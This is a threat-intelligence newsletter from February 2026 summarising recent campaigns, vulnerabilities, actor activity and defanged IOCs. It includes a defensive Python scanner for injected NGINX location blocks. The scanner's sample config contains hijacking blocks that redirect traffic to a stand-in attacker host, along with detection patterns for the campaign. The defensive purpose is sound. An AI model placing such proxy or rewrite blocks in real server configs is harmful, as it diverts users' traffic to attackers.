The Cyber Byte - 9 February 2026

Recent reporting reveals a significant evolution in threat actor capabilities, highlighted by the discovery of sophisticated, modular attack frameworks and the increasing professionalization of cybercrime operations. A newly disclosed China-nexus Adversary-in-the-Middle (AitM) framework, DKnife, demonstrates the ability to compromise network edge devices for deep-packet inspection and malware delivery [6, 12]. Concurrently, the DragonForce ransomware group is restructuring into a cartel model to expand its operations, while high-volume stealer campaigns are leveraging cracked software to infect hundreds of thousands of users globally [5, 11]. A paradigm shift in vulnerability discovery is also emerging, with advanced AI models now demonstrating the capacity to find novel, high-severity 0-days in well-audited codebases [7].

Significant Cyber Incidents and Articles of Interest

  • DKnife AitM Framework Disclosed: A highly sophisticated, modular Adversary-in-the-Middle (AitM) framework named "DKnife" has been uncovered, operated by China-nexus threat actors since at least 2019. The framework targets Linux-based routers and edge devices, using a suite of seven ELF binary implants to perform deep-packet inspection, manipulate network traffic, and deliver malware. Key capabilities include DNS hijacking, hijacking binary downloads and Android application updates, and deploying the ShadowPad and DarkNimbus backdoors. While the campaign primarily targets Chinese-speaking users and services, infrastructure overlaps with the WizardNet backdoor suggest a potentially broader targeting scope. The framework's ability to operate at the gateway level allows for stealthy interception and manipulation of traffic for a wide range of devices, including PCs, mobile, and IoT [6, 12].

  • High-Volume Stealer Campaign Leverages Cracked Games: A massive and ongoing stealer campaign, active since at least April 2025, is distributing malware through cracked versions of popular video games like Far Cry, FIFA, and Assassin's Creed. The campaign has impacted over 400,000 victims globally, with an infection rate of over 5,000 new victims per day, concentrated in India, the United States, and Brazil. The attack uses a dual-stage loader chain, starting with the novel "RenEngine Loader," which abuses the legitimate Ren'Py visual novel game engine to evade detection, followed by a new variant of "HijackLoader." The final payload is the ACR stealer, which exfiltrates browser credentials, cookies, and cryptocurrency wallets [5].

  • Web Traffic Hijacking via Malicious NGINX Configurations: Threat actors, assessed with moderate confidence to be linked to the React2Shell vulnerability (CVE-2025-55182), are running a web traffic hijacking campaign using malicious NGINX server configurations. The attackers deploy a multi-stage toolkit of shell scripts to automatically inject malicious location blocks into NGINX configuration files. This intercepts legitimate user traffic and routes it through attacker-controlled proxy domains to facilitate further attacks. The campaign primarily targets websites with Asian top-level domains (.in, .id, .th), as well as government (.gov) and educational (.edu) domains [1].

  • Critical Authentication Bypass Vulnerability in Moxa Industrial Switches: A critical authentication bypass vulnerability, tracked as CVE-2024-12297 with a CVSS score of 9.2, affects multiple series of Moxa's industrial Ethernet switches. The flaw allows a remote, unauthenticated attacker to bypass login screens through brute-forcing or MD5 collision attacks, leading to full device compromise. Given that these switches are deployed in operational technology (OT) environments, successful exploitation could enable threat actors to disrupt industrial operations, intercept traffic, or pivot to other critical assets within the network. The vulnerability impacts the TN-A and TN-G series switches, and Moxa has released patches that must be obtained directly from technical support [2].

  • Multi-Stage Android Malware Impersonates Indian Government Services: An active Android malware campaign is targeting Indian users by impersonating Regional Transport Office (RTO) challan notifications and other government services. Distributed via WhatsApp and other messaging platforms, the malware uses a three-stage infection chain to maximize persistence and data theft. The stages include a dropper with cryptomining capabilities, a persistence and backend initialization module, and a final data theft payload that collects PII, financial data, and SMS messages. The campaign uses Google's Firebase for its command-and-control (C2) infrastructure and has successfully infected approximately 7,400 devices [3].

  • AI Models Demonstrate 0-Day Vulnerability Discovery Capabilities: The release of Claude Opus 4.6 marks a significant advancement in AI's ability to discover high-severity vulnerabilities in software. Unlike traditional fuzzers that rely on random inputs, the model reasons about code like a human security researcher, analyzing commit histories and identifying unsafe function calls to find bugs. In testing, the model discovered novel vulnerabilities in well-audited, hardened open-source projects such as GhostScript, OpenSC, and CGIF, some of which had gone undetected for decades. This development signals a potential paradigm shift in vulnerability research and disclosure, as AI-driven discovery may soon exceed the speed and scale of human experts [7].

Threat Actor Activity

TTPs (Tactics, Techniques, and Procedures)

  • Adversary-in-the-Middle (AitM) at the Network Edge: The DKnife framework is installed on compromised routers to perform deep-packet inspection, intercept traffic for specific applications like WeChat and Signal, and hijack legitimate software updates to deliver malware payloads such as ShadowPad [6, 12].

  • Bring-Your-Own-Vulnerable-Driver (BYOVD): Threat actors are weaponizing a legitimate but old driver from the EnCase forensic tool to terminate EDR and antivirus processes. The driver's certificate was revoked in 2010, but a loophole in Windows Driver Signature Enforcement allows drivers signed before July 2015 to load, bypassing modern security checks [10].

  • Abuse of Legitimate Software for Loading: The RenEngine Loader abuses the legitimate Ren'Py visual novel engine to masquerade as a game launcher. It uses the engine's archive feature to package and execute malicious Python scripts that decrypt and launch the second-stage HijackLoader [5].

  • Web Server Configuration Hijacking: Attackers are modifying NGINX server configurations by injecting malicious location blocks. These blocks use proxy_pass and rewrite directives to intercept specific traffic based on URL paths (e.g., /pg/, /slot/) and redirect it to attacker-controlled infrastructure [1].

  • Abuse of Trusted Cloud Services: Threat actors are leveraging free Google Firebase accounts to host C2 infrastructure for an Indian Android malware campaign and to send phishing emails from trusted firebaseapp.com domains, increasing the likelihood of bypassing email security filters [3, 9].

  • Sophisticated Social Engineering: macOS users are being targeted with fake CAPTCHA verification pages that install the Odyssey Stealer [4]. In a separate campaign, Indian Android users are lured with RTO-themed messages on WhatsApp to install multi-stage malware [3].
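The NGINX configuration hijacking described above can be hunted for on your own servers by parsing the config and flagging location blocks that match the campaign's URL paths or that proxy or rewrite traffic to a host that is neither local nor a declared upstream. The script below is an added example written for this newsletter, not tooling from the cited report; the sample config and the hijack.example.invalid host are constructed, and the heuristic is meant to surface candidates for review rather than give a definitive verdict.

```python
"""Heuristic scan of an NGINX config for injected traffic-hijacking location blocks."""
import re
from urllib.parse import urlparse

# URL paths the injected blocks were observed matching on (from the report).
SUSPICIOUS_PATHS = ("/pg/", "/slot/")
LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"}

# Constructed sample: a normal reverse proxy plus two injected blocks.
SAMPLE_CONFIG = """
upstream app_pool { server 127.0.0.1:3000; }
server {
    listen 80;
    location / { proxy_pass http://app_pool; }
    location /static/ { root /var/www; }
    location /pg/ { proxy_pass http://hijack.example.invalid; proxy_set_header Host $host; }
    location ~ ^/slot/ { rewrite ^/slot/(.*)$ http://hijack.example.invalid/$1 redirect; }
}
"""

def iter_location_blocks(config):
    """Yield (path, body) for every location block, tracking nested braces."""
    for m in re.finditer(r"\blocation\s+(?:[=~*^]+\s+)?(\S+)\s*\{", config):
        depth, i = 1, m.end()
        while i < len(config) and depth:
            depth += {"{": 1, "}": -1}.get(config[i], 0)
            i += 1
        yield m.group(1), config[m.end():i - 1]

def upstream_names(config):
    return set(re.findall(r"\bupstream\s+(\S+)\s*\{", config))

def external_targets(body, upstreams):
    """Return proxy_pass/rewrite targets that leave this server for a foreign host."""
    hits = []
    for target in re.findall(r"\bproxy_pass\s+(\S+?)\s*;", body):
        host = urlparse(target).hostname or target
        if "unix:" not in target and host not in LOCAL_HOSTS and host not in upstreams:
            hits.append(("proxy_pass", target))
    for target in re.findall(r"\brewrite\s+\S+\s+(https?://\S+?)(?:\s+\w+)?\s*;", body):
        hits.append(("rewrite", target))  # absolute-URL rewrites send the client elsewhere
    return hits

def scan(config):
    """Return [(location_path, [reasons])] for blocks worth a closer look."""
    upstreams, findings = upstream_names(config), []
    for path, body in iter_location_blocks(config):
        reasons = [f"path matches campaign pattern: {path}"] if any(p in path for p in SUSPICIOUS_PATHS) else []
        reasons += [f"{d} to external target {t}" for d, t in external_targets(body, upstreams)]
        if reasons:
            findings.append((path, reasons))
    return findings

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_CONFIG):
        print(path, "->", "; ".join(reasons))
```

Run it over `nginx -T` output to cover every included file, since the campaign's scripts inject into whichever config files they find.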

Affiliations and Operations

  • DragonForce Ransomware Cartel: The DragonForce Ransomware-as-a-Service (RaaS) group is evolving its operational model into a "cartel," allowing affiliates to create and manage their own ransomware brands under the DragonForce umbrella. The group has publicly called for cooperation with other major operations like LockBit and Qilin and has engaged in aggressive tactics against rival groups, including defacing the leak site of BlackLock and claiming that RansomHub has joined their cartel [11].

  • China-Nexus Actors (DKnife): The operators of the DKnife framework are assessed with high confidence to be China-nexus actors. This assessment is based on the use of Simplified Chinese in code and configuration files, the delivery of the ShadowPad backdoor, and the specific targeting of Chinese-language applications and services for data exfiltration [6, 12].

  • Russian-Aligned Actors (Odyssey Stealer): The Odyssey Stealer, a rebranded version of Poseidon Stealer, is being distributed in a campaign that targets macOS users globally but conspicuously avoids victims in CIS nations. This pattern of avoidance is often associated with Russian-aligned cybercriminal groups [4].

  • React2Shell Exploiters: Datadog assesses with moderate confidence that threat actors who previously exploited the React2Shell vulnerability (CVE-2025-55182) are now conducting the NGINX web traffic hijacking campaign, based on temporal correlation and shared infrastructure [1].

Targets and Geographic Focus

  • Global: The RenEngine/HijackLoader campaign delivered via cracked games has achieved a global reach, with over 400,000 victims and notable concentrations in India, the United States, and Brazil [5]. The Odyssey Stealer campaign targeting macOS users is also expanding globally, affecting users in the Americas, Europe, Asia, and Africa [4].

  • Asia-Pacific: The DKnife AitM framework primarily targets Chinese-speaking users and services [6, 12]. The NGINX hijacking campaign focuses on Asian TLDs, including those for India (.in), Indonesia (.id), Peru (.pe), Bangladesh (.bd), and Thailand (.th) [1].

  • India: A multi-stage Android malware campaign is specifically targeting users in India by impersonating government RTO challan notifications distributed via WhatsApp [3].

  • Sectors of Interest: The DragonForce ransomware group has shown a focus on the manufacturing, business services, technology, and construction sectors [11]. The NGINX hijacking campaign specifically targets government (.gov) and educational (.edu) TLDs [1]. The Moxa vulnerability directly impacts organizations in the Operational Technology (OT) sector [2].

Indicators to Watch

New Malware and Tooling

  • DKnife: A modular Linux-based AitM framework composed of seven ELF binaries designed for deployment on routers and edge devices. Its components perform functions including deep-packet inspection, data reporting, traffic forwarding, and malware delivery [6, 12].

  • RenEngine Loader: An initial-stage loader delivered via cracked game installers that abuses the Ren'Py game engine. It performs extensive sandbox checks before decrypting and executing the next-stage payload, HijackLoader [5].

  • Odyssey Stealer: A macOS information stealer that targets over 100 browser extensions, cryptocurrency wallets, browser credentials, and macOS Keychain passwords. It establishes persistence through LaunchDaemons [4].

  • NGINX Injection Toolkit: A collection of shell scripts (zx.sh, bt.sh, 4zdh.sh, etc.) designed to automate the process of finding and injecting malicious configurations into NGINX servers to hijack web traffic [1].

Emerging Campaigns and Phishing Trends

  • Abuse of Google Firebase for Phishing: Be aware of phishing campaigns using sender addresses ending in firebaseapp.com. Attackers are creating free developer accounts to leverage Google's trusted infrastructure and bypass email security filters, often impersonating major brands with urgent alerts or fake giveaways [9].

  • Rise in Digital Squatting for Cybercrime: Threat actors are increasingly using typosquatted and combosquatted domains to host phishing pages and deliver malware. This trend is linked to a rise in phishing attacks and business email compromise (BEC), with WIPO handling a record number of domain disputes in 2025 [8].

  • BYOVD Attacks with Legacy Drivers: Monitor for the loading of old but validly signed kernel drivers, especially those signed before July 29, 2015. Threat actors are actively using drivers with expired or revoked certificates, such as the EnCase driver, to gain kernel-level access and terminate EDR and antivirus software [10].

Suspicious Infrastructure and IOCs

  • NGINX Hijacking C2 IP: 158.94.210[.]227 [1].

  • NGINX Malicious Backend Domains: xzz.pier46[.]com, ide.hashbank8[.]com, th.cogicpt[.]org [1].

  • Odyssey Stealer C2 IP: 45.46.130[.]131 [4].

  • ACR Stealer C2 IP (RenEngine Campaign): 78[.]40[.]193[.]126 [5].

  • DKnife / WizardNet C2 IP: 43.132.205[.]118 [6, 12].

  • DragonForce Associated IPs: 193[.]233.175.213, 95[.]164.53.64, 91[.]108.244.85 [11].
